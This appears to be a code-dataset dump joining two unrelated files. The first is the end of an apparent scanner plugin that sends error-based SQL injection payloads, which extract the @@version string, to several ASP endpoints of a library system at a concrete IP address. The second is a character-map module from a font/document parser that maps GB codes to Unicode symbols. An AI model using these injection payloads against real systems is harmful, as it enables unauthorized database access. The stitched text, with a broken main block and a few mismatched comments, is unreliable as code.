        arg + 'gl_tz_she.asp?zt=1&id=1',
        arg + 'gl_us_shan.asp?id=1',
        arg + 'gl_xiu.asp?id=1',
        arg + 'mafen.asp?shuxing=1',
        arg + 'ping_cha.asp?mingcheng=1',
        arg + 'ping_hao.asp?mingcheng=1',
        arg + 'pl_add.asp?id=1',
        arg + 'search.asp?keywords=1&shuxing=1',
    ]
    for url in urls:
        # append the probe payload; a vulnerable server echoes the marker
        # string back in its error/response body
        url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
        code, head, res, err, _ = curl.curl2(url)
        if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
            security_hole("SQL Injection: " + url)
    # one endpoint needs a differently-shaped payload, checked separately
    url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
    code, head, res, err, _ = curl.curl2(url)
    if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
        security_hole("SQL Injection: " + url)
if __name__ == '__main__':
from dummy import *
audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1]) | 41.628571 | 154 | 0.587509 |
c93112ec790fae5b416d3ab6e0ee349a48489f55 | 49,239 | py | Python | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | 7 | 2021-03-15T08:43:56.000Z | 2022-01-09T11:56:43.000Z | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | null | null | null | FBDParser/charmaps/symbols.py | jonix6/fbdparser | 617a79bf9062092e4fa971bbd66da02cd9d45124 | [
"MIT"
] | 3 | 2021-09-07T09:40:16.000Z | 2022-01-11T10:32:23.000Z | # -*- coding: utf-8 -*-
def gb2unicode_simple(x):
    """Map a two-byte FBD/GB code (e.g. 0xA140) to a Unicode code point.

    Codes whose byte pair falls in the ranges 0xAA..0xAF x 0xA1..0xFE or
    0xA1..0xA7 x (0x40..0x7E | 0x80..0xA0) land in the BMP Private Use
    Area; everything else is decoded as GB18030.
    """
    hi = (x >> 8) & 0xFF
    lo = x & 0xFF
    if 0xAA <= hi <= 0xAF and 0xA1 <= lo <= 0xFE:
        # 0x5E codes per row, rows starting at U+E000
        return 0xE000 + (hi - 0xAA) * 0x5E + (lo - 0xA1)
    if 0xA1 <= hi <= 0xA7 and (0x40 <= lo <= 0x7E or 0x80 <= lo <= 0xA0):
        # the 0x7F column is skipped, so the upper half shifts by one
        col = lo - 0x41 if lo >= 0x80 else lo - 0x40
        return 0xE4C6 + (hi - 0xA1) * 0x60 + col
    return ord(bytearray([hi, lo]).decode('gb18030'))
def _unichr(x):
if x <= 0xFFFF:
return x
# U+10000 ~ U+10FFFF
return bytearray([
0xF0 | (x >> 18 & 0x7), 0x80 | (x >> 12 & 0x3F),
0x80 | (x >> 6 & 0x3F), 0x80 | (x & 0x3F)]).decode('utf-8')
class UnicodeMap(dict):
    """dict of FBD/GB code -> Unicode value, filled via update() from raw
    mapping tables; identity entries (key == value) are dropped."""

    def __str__(self):
        return 'unicode map contains {0} symbols'.format(len(self))

    def update(self, hashmap):
        """Fold a {gb_code: unicode_value} table into the map, converting
        keys with gb2unicode_simple and values with _unichr."""
        for src, dst in hashmap.items():
            if src != dst:
                self[gb2unicode_simple(src)] = _unichr(dst)
"A库符号"
symbolsA = UnicodeMap()
_update = symbolsA.update
# Area A1
_update({
0xA140: 0xA140, # 带括弧的小写罗马数字1((ⅰ))
0xA141: 0xA141, # 带括弧的小写罗马数字2((ⅱ))
0xA142: 0xA142, # 带括弧的小写罗马数字3((ⅲ))
0xA143: 0xA143, # 带括弧的小写罗马数字4((ⅳ))
0xA144: 0xA144, # 带括弧的小写罗马数字5((ⅴ))
0xA145: 0xA145, # 带括弧的小写罗马数字6((ⅵ))
0xA146: 0xA146, # 带括弧的小写罗马数字7((ⅶ))
0xA147: 0xA147, # 带括弧的小写罗马数字8((ⅷ))
0xA148: 0xA148, # 带括弧的小写罗马数字9((ⅸ))
0xA149: 0xA149, # 带括弧的小写罗马数字10((ⅹ))
0xA14A: 0xA14A, # 带括弧的小写罗马数字11((ⅺ))
0xA14B: 0xA14B, # 带括弧的小写罗马数字12((ⅻ))
0xA14C: 0x003D, # 三分宽等号 = =
0xA14D: 0x2212, # 三分宽减号 = −
0xA14E: 0x2215, # 三分宽斜线(除号) = ∕
0xA14F: 0x1D7CE, # 𝟎
0xA150: 0x1D7CF, # 𝟏
0xA151: 0x1D7D0, # 𝟐
0xA152: 0x1D7D1, # 𝟑
0xA153: 0x1D7D2, # 𝟒
0xA154: 0x1D7D3, # 𝟓
0xA155: 0x1D7D4, # 𝟔
0xA156: 0x1D7D5, # 𝟕
0xA157: 0x1D7D6, # 𝟖
0xA158: 0x1D7D7, # 𝟗
0xA159: 0x2664, # ♤
0xA15A: 0x2667, # ♧
0xA15B: 0x00B6, # ¶
0xA15C: 0x26BE, # ⚾
0xA15D: 0x263E, # 上1/4月亮 = ☾
0xA15E: 0x263D, # 下1/4月亮 = ☽
0xA15F: 0x263A, # 笑脸 = ☺
0xA160: 0x1F31C, # 半脸 = 🌜
0xA161: 0x1F31B, # 半脸 = 🌛
0xA162: 0x3036, # 〶
0xA163: 0x2252, # 近似符等号 = ≒
0xA164: 0xA164, # 吨号(T + S)
0xA165: 0x002B, # 三分宽加号 = +
0xA166: 0x223C, # 三分宽减号 = ∼
0xA167: 0x00A9, # ©
0xA168: 0x24D2, # ⓒ
0xA169: 0x24B8, # Ⓒ
0xA16A: 0x00AE, # ®
0xA16B: 0x24C7, # Ⓡ
0xA16D: 0x203E, # 上横线 = ‾
0xA16E: 0x005F, # 下横线 = _
0xA16F: 0x25E2, # ◢
0xA170: 0x25E3, # ◣
0xA171: 0x25E5, # ◥
0xA172: 0x25E4, # ◤
0xA173: 0x256D, # ╭
0xA174: 0x256E, # ╮
0xA175: 0x2570, # ╰
0xA176: 0x256F, # ╯
0xA177: 0x2550, # 双横线 = ═
0xA178: 0x2551, # 双竖线 = ║
0xA179: 0x2223, # 分开、绝对值 = ∣
0xA17A: 0x2926, # ⤦
0xA17B: 0x2924, # ⤤
0xA17C: 0x2923, # ⤣
0xA17D: 0x293E, # ⤾
0xA17E: 0x293F, # ⤿
0xA180: 0x21E7, # ⇧
0xA181: 0x21E9, # ⇩
0xA182: 0xA182, # 数字阳框码0(□ + 0)
0xA183: 0xA183, # 数字阳框码1(□ + 1)
0xA184: 0xA184, # 数字阳框码2(□ + 2)
0xA185: 0xA185, # 数字阳框码3(□ + 3)
0xA186: 0xA186, # 数字阳框码4(□ + 4)
0xA187: 0xA187, # 数字阳框码5(□ + 5)
0xA188: 0xA188, # 数字阳框码6(□ + 6)
0xA189: 0xA189, # 数字阳框码7(□ + 7)
0xA18A: 0xA18A, # 数字阳框码8(□ + 8)
0xA18B: 0xA18B, # 数字阳框码9(□ + 9)
0xA18C: 0xA18C, # 数字阴框码0(0️⃣)
0xA18D: 0xA18D, # 数字阴框码1(1️⃣)
0xA18E: 0xA18E, # 数字阴框码2(2️⃣)
0xA18F: 0xA18F, # 数字阴框码3(3️⃣)
0xA190: 0xA190, # 数字阴框码4(4️⃣)
0xA191: 0xA191, # 数字阴框码5(5️⃣)
0xA192: 0xA192, # 数字阴框码6(6️⃣)
0xA193: 0xA193, # 数字阴框码7(7️⃣)
0xA194: 0xA194, # 数字阴框码8(8️⃣)
0xA195: 0xA195, # 数字阴框码9(9️⃣)
0xA196: 0x1F6AD, # 🚭
0xA197: 0x1F377, # 🍷
0xA198: 0x26A0, # ⚠
0xA199: 0x2620, # ☠
0xA19A: 0xA19A, # (🚫 + 🔥)
0xA19B: 0x2B4D, # ⭍
0xA19C: 0x21B7, # ↷
0xA19D: 0x293A, # ⤺
0xA19E: 0x2716, # ✖
0xA19F: 0x003F, # 问号 = ?
0xA1A0: 0x0021 # 外文感叹号 = !
})
# Area A2
_update({
0xA240: 0x231C, # ⌜
0xA241: 0x231F, # ⌟
0xA242: 0xA242, # (empty ⌜)
0xA243: 0xA243, # (empty ⌟)
0xA244: 0x231D, # ⌝
0xA245: 0x231E, # ⌞
0xA246: 0xA246, # (empty ⌝)
0xA247: 0xA247, # (empty ⌞)
0xA248: 0xFF1C, # <
0xA249: 0xFF1E, # >
0xA24A: 0x2AA1, # ⪡
0xA24B: 0x2AA2, # ⪢
0xA24C: 0xA24C, # (vertical ”)
0xA24D: 0xA24D, # (vertical “)
0xA24E: 0x201E, # „
0xA24F: 0xA24F, # 斜感叹号(italic !)
0xA250: 0xA250, # 斜问号(italic ?)
0xA251: 0xA76C, # ❬
0xA252: 0xA76D, # ❭
0xA253: 0xA253, # (reversed 「)
0xA254: 0xA254, # (reversed 」)
0xA255: 0xA255, # (reversed 『)
0xA256: 0xA256, # (reversed 』)
0xA257: 0x203C, # 双叹号 = ‼
0xA258: 0xA258, # 斜双叹号(italic ‼)
0xA259: 0x2047, # 双问号 = ⁇
0xA25A: 0xA25A, # 斜双问号(italic ⁇)
0xA25B: 0x2048, # 疑问感叹号 = ⁈
0xA25C: 0xA25C, # 斜疑问感叹号(italic ⁈)
0xA25D: 0x2049, # 感叹疑问号 = ⁉
0xA25E: 0xA25E, # 斜感叹疑问号(italic ⁉)
0xA25F: 0xA25F, # 竖排小数点(vertical .)
0xA260: 0x03D6, # 希腊文符号PI = ϖ
0xA261: 0x2116, # №
0xA262: 0x0142, # 多国外文:带笔画的小写字母l = ł
0xA263: 0x0131, # 多国外文:无点的小写字母I = ı
0xA264: 0x014B, # 多国外文:小写字母eng = ŋ
0xA265: 0x0327, # 下加符 = ̧
0xA266: 0x00BF, # 倒置问号 = ¿
0xA267: 0x00A1, # 倒置感叹号 = ¡
0xA268: 0x00D8, # 多国外文:带笔画的大写字母O = Ø
0xA269: 0x00F8, # 多国外文:带笔画的小写字母o = ø
0xA26A: 0x0087, # 二重剑标 = ‡
0xA26B: 0x0086, # 短剑标 = †
0xA26C: 0x014A, # 多国外文:大写字母ENG = Ŋ
0xA26D: 0xFB00, # 多国外文 = ff
0xA26E: 0xFB01, # 多国外文 = fi
0xA26F: 0xFB02, # 多国外文 = fl
0xA270: 0xFB03, # 多国外文 = ffi
0xA271: 0xFB04, # 多国外文 = ffl
0xA272: 0x0141, # 多国外文 = Ł
0xA273: 0x00C7, # 多国外文 = Ç
0xA274: 0x00C6, # 多国外文 = Æ
0xA275: 0x00E6, # 多国外文 = æ
0xA276: 0x008C, # 多国外文 = Œ
0xA277: 0x009C, # 多国外文 = œ
0xA278: 0x00DF, # 多国外文 = ß
0xA279: 0x0083, # 多国外文 = ƒ
0xA27A: 0x00E5, # 多国外文 = å
0xA27B: 0x00E2, # 多国外文 = â
0xA27C: 0x00E4, # 多国外文 = ä
0xA27D: 0x0101, # 多国外文 = ā
0xA27E: 0x00E1, # 多国外文 = á
0xA280: 0x01CE, # 多国外文 = ǎ
0xA281: 0x00E0, # 多国外文 = à
0xA282: 0x00E3, # 多国外文 = ã
0xA283: 0x00EB, # 多国外文 = ë
0xA284: 0x1EBD, # 多国外文 = ẽ
0xA285: 0x00EE, # 多国外文 = î
0xA286: 0x00EF, # 多国外文 = ï
0xA287: 0x00F5, # 多国外文 = õ
0xA288: 0x00F4, # 多国外文 = ô
0xA289: 0x00F6, # 多国外文 = ö
0xA28A: 0x00FB, # 多国外文 = û
0xA28B: 0x00F1, # 多国外文 = ñ
0xA28C: 0x009A, # 多国外文 = š
0xA28D: 0x015D, # 多国外文 = ŝ
0xA28E: 0x011D, # 多国外文 = ĝ
0xA28F: 0x00FF, # 多国外文 = ÿ
0xA290: 0x009E, # 多国外文 = ž
0xA291: 0x1E91, # 多国外文 = ẑ
0xA292: 0x0109, # 多国外文 = ĉ
0xA293: 0x00E7, # 多国外文 = ç
0xA294: 0xA294, # 多国外文(ê̄)
0xA295: 0x1EBF, # 多国外文 = ế
0xA296: 0xA296, # 多国外文(ê̌)
0xA297: 0x1EC1, # 多国外文 = ề
0xA29A: 0x0307, # 组合用发音符 = ̇
0xA29B: 0x030A, # 组合用发音符 = ̊
0xA29C: 0x0303, # 组合用发音符 = ̃
0xA29D: 0x20F0, # 组合用发音符 = ⃰
0xA29E: 0x0306, # 组合用发音符 = ̆
0xA29F: 0x002C, # 外文逗号 = ,
0xA2A0: 0x0085, # 外文三点省略号,外文三连点 = …
0xA2AB: 0x217A, # 小写罗马数字11 = ⅺ
0xA2AC: 0x217B, # 小写罗马数字12 = ⅻ
0xA2AD: 0xA2AD, # 小写罗马数字13(ⅹⅲ)
0xA2AE: 0xA2AE, # 小写罗马数字14(ⅹⅳ)
0xA2AF: 0xA2AF, # 小写罗马数字15(ⅹⅴ)
0xA2B0: 0xA2B0, # 小写罗马数字16(ⅹⅵ)
0xA2EF: 0xA2EF, # 大写罗马数字15(ⅩⅤ)
0xA2F0: 0xA2F0, # 大写罗马数字16(ⅩⅥ)
0xA2FD: 0xA2FD, # 大写罗马数字13(ⅩⅢ)
0xA2FE: 0xA2FE, # 大写罗马数字14(ⅩⅣ)
})
# Area A3
_update({
0xA340: 0xA340, # 带括号的大写罗马数字1((Ⅰ))
0xA341: 0xA341, # 带括号的大写罗马数字2((Ⅱ))
0xA342: 0xA342, # 带括号的大写罗马数字3((Ⅲ))
0xA343: 0xA343, # 带括号的大写罗马数字4((Ⅳ))
0xA344: 0xA344, # 带括号的大写罗马数字5((Ⅴ))
0xA345: 0xA345, # 带括号的大写罗马数字6((Ⅵ))
0xA346: 0xA346, # 带括号的大写罗马数字7((Ⅶ))
0xA347: 0xA347, # 带括号的大写罗马数字8((Ⅷ))
0xA348: 0xA348, # 带括号的大写罗马数字9((Ⅸ))
0xA349: 0xA349, # 带括号的大写罗马数字10((Ⅹ))
0xA34A: 0xA34A, # 带括号的大写罗马数字11((Ⅺ))
0xA34B: 0xA34B, # 带括号的大写罗马数字12((Ⅻ))
0xA34C: 0x24FF, # 数字阴圈码0 = ⓿
0xA34D: 0x2776, # 数字阴圈码1 = ❶
0xA34E: 0x2777, # 数字阴圈码2 = ❷
0xA34F: 0x2778, # 数字阴圈码3 = ❸
0xA350: 0x2779, # 数字阴圈码4 = ❹
0xA351: 0x277A, # 数字阴圈码5 = ❺
0xA352: 0x277B, # 数字阴圈码6 = ❻
0xA353: 0x277C, # 数字阴圈码7 = ❼
0xA354: 0x277D, # 数字阴圈码8 = ❽
0xA355: 0x277E, # 数字阴圈码9 = ❾
0xA356: 0x24B6, # 字母阳圈码A = Ⓐ
0xA357: 0x24B7, # 字母阳圈码B = Ⓑ
0xA358: 0x24B8, # 字母阳圈码C = Ⓒ
0xA359: 0x24B9, # 字母阳圈码D = Ⓓ
0xA35A: 0x24BA, # 字母阳圈码E = Ⓔ
0xA35B: 0x24BB, # 字母阳圈码F = Ⓕ
0xA35C: 0x24BC, # 字母阳圈码G = Ⓖ
0xA35D: 0x24BD, # 字母阳圈码H = Ⓗ
0xA35E: 0x24BE, # 字母阳圈码I = Ⓘ
0xA35F: 0x24BF, # 字母阳圈码J = Ⓙ
0xA360: 0x1F110, # 圆括号码A = 🄐
0xA361: 0x1F111, # 圆括号码B = 🄑
0xA362: 0x1F112, # 圆括号码C = 🄒
0xA363: 0x1F113, # 圆括号码D = 🄓
0xA364: 0x1F114, # 圆括号码E = 🄔
0xA365: 0x1F115, # 圆括号码F = 🄕
0xA366: 0x1F116, # 圆括号码G = 🄖
0xA367: 0x1F117, # 圆括号码H = 🄗
0xA368: 0x1F118, # 圆括号码I = 🄘
0xA369: 0x1F119, # 圆括号码J = 🄙
0xA36A: 0x24D0, # 阳圈码a = ⓐ
0xA36B: 0x24D1, # 阳圈码b = ⓑ
0xA36C: 0x24D2, # 阳圈码c = ⓒ
0xA36D: 0x24D3, # 阳圈码d = ⓓ
0xA36E: 0x24D4, # 阳圈码e = ⓔ
0xA36F: 0x24D5, # 阳圈码f = ⓕ
0xA370: 0x24D6, # 阳圈码g = ⓖ
0xA371: 0x24D7, # 阳圈码h = ⓗ
0xA372: 0x24D8, # 阳圈码i = ⓘ
0xA373: 0x24D9, # 阳圈码j = ⓙ
0xA374: 0x249C, # 圆括号码a = ⒜
0xA375: 0x249D, # 圆括号码b = ⒝
0xA376: 0x249E, # 圆括号码c = ⒞
0xA377: 0x249F, # 圆括号码d = ⒟
0xA378: 0x24A0, # 圆括号码e = ⒠
0xA379: 0x24A1, # 圆括号码f = ⒡
0xA37A: 0x24A2, # 圆括号码g = ⒢
0xA37B: 0x24A3, # 圆括号码h = ⒣
0xA37C: 0x24A4, # 圆括号码i = ⒤
0xA37D: 0x24A5, # 圆括号码j = ⒥
0xA37E: 0x3396, # 单位符号:毫升 = ㎖
0xA380: 0x3397, # ㎗
0xA381: 0x33CB, # 单位符号:百帕 = ㏋
0xA382: 0x3398, # 单位符号:立升 = ㎘
0xA383: 0x33A0, # 单位符号:平方厘米 = ㎠
0xA384: 0x33A4, # 单位符号:立方厘米 = ㎤
0xA385: 0x33A5, # 单位符号:立方米 = ㎥
0xA386: 0x33A2, # 单位符号:平方公里 = ㎢
0xA387: 0x33BE, # 单位符号:千瓦 = ㎾
0xA388: 0x33C4, # ㏄
0xA389: 0x3383, # 单位符号:毫安 = ㎃
0xA38A: 0x33C2, # ㏂
0xA38B: 0x33D8, # ㏘
0xA38C: 0x33CD, # ㏍
0xA38D: 0x33D7, # ㏗
0xA38E: 0x33DA, # ㏚
0xA38F: 0x339C, # ㎜
0xA390: 0x339D, # ㎝
0xA391: 0x339E, # ㎞
0xA392: 0x33CE, # 单位符号:公里 = ㏎
0xA393: 0x338E, # 单位符号:毫克 = ㎎
0xA394: 0x338F, # 单位符号:千克(公斤) = ㎏
0xA395: 0x33A1, # 单位符号:平方米 = ㎡
0xA396: 0x33D2, # ㏒
0xA397: 0x33D1, # ㏑
0xA398: 0x33C4, # ㏄
0xA399: 0x33D5, # ㏕
0xA39A: 0xAB36, # ꬶ
0xA39B: 0x2113, # ℓ
0xA39C: 0x006D, # m
0xA39D: 0x0078, # x
0xA39E: 0x1EFF, # ỿ
0xA39F: 0x0028, # 左开圆括号 = (
0xA3A0: 0x0029, # 右闭圆括号 = )
})
# Area A4
_update({
0xA440: 0xA440, # BD语言注解:四分空(◯ + ¼)
0xA441: 0xA441, # BD语言注解:二分空(◯ + ½)
0xA442: 0xA442, # BD语言注解:六分空(◯ + ⅙)
0xA443: 0xA443, # BD语言注解:八分空(◯ + ⅙)
0xA444: 0xA444, # (◇ + ◼ + ⬦)
0xA445: 0xA445, # (◇ + ◻)
0xA446: 0xA446, # (☐ + ◆ + ◻)
0xA447: 0xA447, # (⏹ + ⬦)
0xA448: 0x29C8, # ⧈
0xA449: 0x1F79C, # 🞜
0xA44A: 0xA44A, # (◆ + ◻)
0xA44B: 0xA44B, # (◇ + ◼)
0xA44C: 0xA44C, # (☐ + ◆)
0xA44D: 0x26CB, # ⛋
0xA44E: 0x2756, # ❖
0xA44F: 0xA44F, # (negative ❖)
0xA450: 0xA450, # (5-black-square cross, like ⸭)
0xA451: 0xA451, # (5-white-square cross, like ⌘)
0xA452: 0x2795, # ➕
0xA453: 0x271A, # ✚
0xA454: 0x23FA, # ⏺
0xA455: 0x2704, # ✄
0xA456: 0x25C9, # ◉
0xA457: 0x2A00, # ⨀
0xA458: 0x2740, # ❀
0xA459: 0x273F, # ✿
0xA45A: 0x2668, # ♨
0xA45B: 0x2669, # ♩
0xA45C: 0x266A, # ♪
0xA45D: 0x266C, # ♬
0xA45E: 0x2B57, # ⭗
0xA45F: 0x26BE, # ⚾
0xA460: 0x260E, # ☎
0xA461: 0x2025, # ‥
0xA462: 0x261C, # ☜
0xA463: 0x261E, # ☞
0xA464: 0x3021, # 杭州记数标记“一” = 〡
0xA465: 0x3022, # 杭州记数标记“二” = 〢
0xA466: 0x3023, # 杭州记数标记“三” = 〣
0xA467: 0x3024, # 杭州记数标记“四” = 〤
0xA468: 0x3025, # 杭州记数标记“五” = 〥
0xA469: 0x3026, # 杭州记数标记“六” = 〦
0xA46A: 0x3027, # 杭州记数标记“七” = 〧
0xA46B: 0x3028, # 杭州记数标记“八” = 〨
0xA46C: 0x3029, # 杭州记数标记“九” = 〩
0xA46D: 0x3038, # 杭州记数标记“十” = 〸
0xA46E: 0x3039, # 杭州记数标记“廿” = 〹
0xA46F: 0x303A, # 杭州记数标记“卅” = 〺
0xA470: 0x25A2, # ▢
0xA471: 0x00AE, # ®
0xA472: 0x25CF, # ●
0xA473: 0x25CB, # ○
0xA474: 0x25CB, # ♡
0xA475: 0x25CA, # ◊
0xA476: 0xA476, # (▽ + ▿)
0xA477: 0x2236, # ∶
0xA478: 0xA478, # 毫米(m/m)
0xA479: 0xA479, # 厘米(c/m)
0xA47A: 0xA47A, # 分米(d/m)
0xA47B: 0x2105, # ℅
0xA47D: 0xA47D, # (circled ™)
0xA47E: 0x2122, # ™
0xA480: 0xAB65, # ꭥ
0xA481: 0x026E, # ɮ
0xA482: 0x02A7, # ʧ
0xA483: 0x01EB, # ǫ
0xA484: 0x03C5, # υ
0xA485: 0xA7AC, # Ɡ
0xA486: 0x1D93, # ᶓ
0xA487: 0x1D74, # ᵴ
0xA488: 0x1D92, # ᶒ
0xA489: 0x1D95, # ᶕ
0xA48A: 0x02AE, # ʮ
0xA48B: 0x1D8B, # ᶋ
0xA48C: 0x0119, # ę
0xA48D: 0x01BE, # ƾ
0xA48E: 0x1D97, # ᶗ
0xA48F: 0x0293, # ʓ
0xA490: 0xA490, # (hɥ)
0xA491: 0x0253, # ɓ
0xA492: 0x0287, # ʇ
0xA493: 0x01AB, # ƫ
0xA494: 0x028D, # ʍ
0xA495: 0x1D8D, # ᶍ
0xA496: 0x0269, # ɩ
0xA497: 0x025C, # ɜ
0xA498: 0x02A5, # ʥ
0xA499: 0x019E, # ƞ
0xA49A: 0x01AA, # ƪ
0xA49B: 0x0250, # ɐ
0xA49C: 0x0286, # ʆ
0xA49D: 0x01BB, # ƻ
0xA49E: 0x00D8, # Ø
0xA4F4: 0xA4F4, # 三叹号(!!!)
0xA4F5: 0xA4F5, # 斜三叹号(italic !!!)
0xA4F6: 0x32A3, # 带圈汉字:正 = ㊣
0xA4F7: 0x329E, # 带圈汉字:印 = ㊞
0xA4F8: 0x32A4, # 带圈汉字:上 = ㊤
0xA4F9: 0x32A5, # 带圈汉字:中 = ㊥
0xA4FA: 0x32A6, # 带圈汉字:下 = ㊦
0xA4FB: 0x32A7, # 带圈汉字:左 = ㊧
0xA4FC: 0x32A8, # 带圈汉字:右 = ㊨
0xA4FD: 0xA4FD, # 带圈汉字:大(◯ + 大)
0xA4FE: 0xA4FE, # 带圈汉字:小(◯ + 小)
})
# Area A5
_update({
0xA540: 0x0111, # đ
0xA541: 0x1D80, # ᶀ
0xA542: 0x1D81, # ᶁ
0xA543: 0x0252, # ɒ
0xA544: 0xA544, # (ŋ + ʷ)
0xA545: 0x026B, # ɫ
0xA546: 0x1D88, # ᶈ
0xA547: 0x1D82, # ᶂ
0xA548: 0x02A6, # ʦ
0xA549: 0x025F, # ɟ
0xA54A: 0x00FE, # þ
0xA54B: 0x0257, # ɗ
0xA54C: 0xAB67, # ꭧ
0xA54D: 0x0260, # ɠ
0xA54E: 0x0242, # ɂ
0xA54F: 0x02AF, # ʯ
0xA550: 0xA550, # (ʯ)
0xA551: 0x0241, # Ɂ
0xA552: 0x025A, # ɚ
0xA553: 0x1D8A, # ᶊ
0xA554: 0x0296, # ʖ
0xA555: 0x1D8C, # ᶌ
0xA556: 0x1D75, # ᵵ
0xA557: 0x1D6D, # ᵭ
0xA558: 0x027D, # ɽ
0xA559: 0x027A, # ɺ
0xA55A: 0x01BA, # ƺ
0xA55B: 0xA55B, # (turned ɰ)
0xA55C: 0x0273, # ɳ
0xA55D: 0xA795, # ꞕ
0xA55E: 0x01B0, # ư
0xA55F: 0x1D85, # ᶅ
0xA560: 0x0260, # ɠ
0xA561: 0x1D86, # ᶆ
0xA562: 0x0277, # ɷ
0xA563: 0x02A4, # ʤ
0xA564: 0x02A3, # ʣ
0xA565: 0x1D87, # ᶇ
0xA566: 0x1D7C, # ᵼ
0xA567: 0x02A8, # ʨ
0xA568: 0x1D8F, # ᶏ
0xA569: 0x029A, # ʚ
0xA56A: 0x1D9A, # ᶚ
0xA56B: 0xA727, # ꜧ
0xA56C: 0x1D83, # ᶃ
0xA56D: 0xA56D, # (italic ŋ)
0xA56E: 0x029E, # ʞ
0xA56F: 0x0195, # ƕ
0xA570: 0x1D76, # ᵶ
0xA571: 0x027E, # ɾ
0xA572: 0x1D8E, # ᶎ
0xA573: 0x1D89, # ᶉ
0xA574: 0x027C, # ɼ
0xA575: 0x0279, # ɹ
0xA576: 0x018D, # ƍ
0xA577: 0x03C9, # ω
0xA578: 0x025D, # ɝ
0xA579: 0x03C3, # σ
0xA57A: 0x027B, # ɻ
0xA57B: 0x026D, # ɭ
0xA57C: 0x0267, # ɧ
0xA57D: 0x025A, # ɚ
0xA57E: 0xAB66, # ꭦ
0xA580: 0x5F02, # 异
0xA581: 0x28473, # 𨑳
0xA582: 0x5194, # 冔
0xA583: 0x247A3, # 𤞣
0xA584: 0x2896D, # 𨥭
0xA585: 0x5642, # 噂
0xA586: 0x7479, # 瑹
0xA587: 0x243B9, # 𤎹
0xA588: 0x723F, # 爿
0xA589: 0x9D56, # 鵖
0xA58A: 0x4D29, # 䴩
0xA58B: 0x20779, # 𠝹
0xA58C: 0x210F1, # 𡃱
0xA58D: 0x2504C, # 𥁌
0xA58E: 0x233CC, # 𣏌
0xA58F: 0x032F, # 下加符 = ̯
0xA590: 0x0312, # 下加符 = ̒
0xA591: 0x030D, # 下加符 = ̍
0xA592: 0x0314, # 下加符 = ̔
0xA593: 0x0313, # 下加符 = ̓
0xA594: 0x2F83B, # 吆
0xA595: 0x25EC0, # 𥻀
0xA596: 0x445B, # 䑛
0xA597: 0x21D3E, # 𡴾
0xA598: 0x0323, # 下加符 = ̣
0xA599: 0x0325, # 下加符 = ̥
0xA59A: 0x0331, # 下加符 = ̱
0xA59B: 0x032A, # 下加符 = ̪
0xA59C: 0x032C, # 下加符 = ̬
0xA59D: 0x032B, # 下加符 = ̫
0xA59E: 0x0329, # 下加符 = ̩
0xA59F: 0xFF5B, # 左开花括号 = {
0xA5A0: 0xFF5D, # 右闭花括号 = }
0xA5F7: 0x3016, # 左空方圆括号 = 〖
0xA5F8: 0x3017, # 右空方圆括号 = 〗
0xA5F9: 0x29DB, # ⧛
0xA5FA: 0xA5FA, # (vertical ⧛)
0xA5FB: 0x534D, # 卍
0xA5FC: 0xFE47, # 竖排上方括号 = ﹇
0xA5FD: 0xFE48, # 竖排下方括号 = ﹈
0xA5FE: 0x2571, # 斜线 = ╱
})
# Area A6
_update({
0xA640: 0x00C5, # 多国外文 = Å
0xA641: 0x0100, # 多国外文 = Ā
0xA642: 0x00C1, # 多国外文 = Á
0xA643: 0x01CD, # 多国外文 = Ǎ
0xA644: 0x00C0, # 多国外文 = À
0xA645: 0x00C2, # 多国外文 = Â
0xA646: 0x00C4, # 多国外文 = Ä
0xA647: 0x00C3, # 多国外文 = Ã
0xA648: 0x0112, # 多国外文 = Ē
0xA649: 0x00C9, # 多国外文 = É
0xA64A: 0x011A, # 多国外文 = Ě
0xA64B: 0x00C8, # 多国外文 = È
0xA64C: 0x00CA, # 多国外文 = Ê
0xA64D: 0x00CB, # 多国外文 = Ë
0xA64E: 0x1EBC, # 多国外文 = Ẽ
0xA64F: 0x012A, # 多国外文 = Ī
0xA650: 0x00CD, # 多国外文 = Í
0xA651: 0x01CF, # 多国外文 = Ǐ
0xA652: 0x00CC, # 多国外文 = Ì
0xA653: 0x00CE, # 多国外文 = Î
0xA654: 0x00CF, # 多国外文 = Ï
0xA655: 0x014C, # 多国外文 = Ō
0xA656: 0x00D3, # 多国外文 = Ó
0xA657: 0x01D1, # 多国外文 = Ǒ
0xA658: 0x00D2, # 多国外文 = Ò
0xA659: 0x00D4, # 多国外文 = Ô
0xA65A: 0x00D6, # 多国外文 = Ö
0xA65B: 0x00D5, # 多国外文 = Õ
0xA65C: 0x016A, # 多国外文 = Ū
0xA65D: 0x00DA, # 多国外文 = Ú
0xA65E: 0x01D3, # 多国外文 = Ǔ
0xA65F: 0x00D9, # 多国外文 = Ù
0xA660: 0x00DB, # 多国外文 = Û
0xA661: 0x00DC, # 多国外文 = Ü
0xA662: 0x01D5, # 多国外文 = Ǖ
0xA663: 0x01D7, # 多国外文 = Ǘ
0xA664: 0x01D9, # 多国外文 = Ǚ
0xA665: 0x01DB, # 多国外文 = Ǜ
0xA666: 0xA666, # 多国外文(Ü̂)
0xA667: 0x0108, # 多国外文 = Ĉ
0xA668: 0x011C, # 多国外文 = Ĝ
0xA669: 0x0124, # 多国外文 = Ĥ
0xA66A: 0x0134, # 多国外文 = Ĵ
0xA66B: 0x0160, # 多国外文 = Š
0xA66C: 0x015C, # 多国外文 = Ŝ
0xA66D: 0x0178, # 多国外文 = Ÿ
0xA66E: 0x017D, # 多国外文 = Ž
0xA66F: 0x1E90, # 多国外文 = Ẑ
0xA670: 0x0125, # 多国外文 = ĥ
0xA671: 0x0135, # 多国外文 = ĵ
0xA672: 0x00D1, # 多国外文 = Ñ
0xA673: 0x00E1, # á
0xA674: 0x00E9, # é
0xA675: 0x00ED, # í
0xA676: 0x00F3, # ó
0xA677: 0x00FA, # ú
0xA678: 0x2339D, # 𣎝
0xA679: 0x29F15, # 𩼕
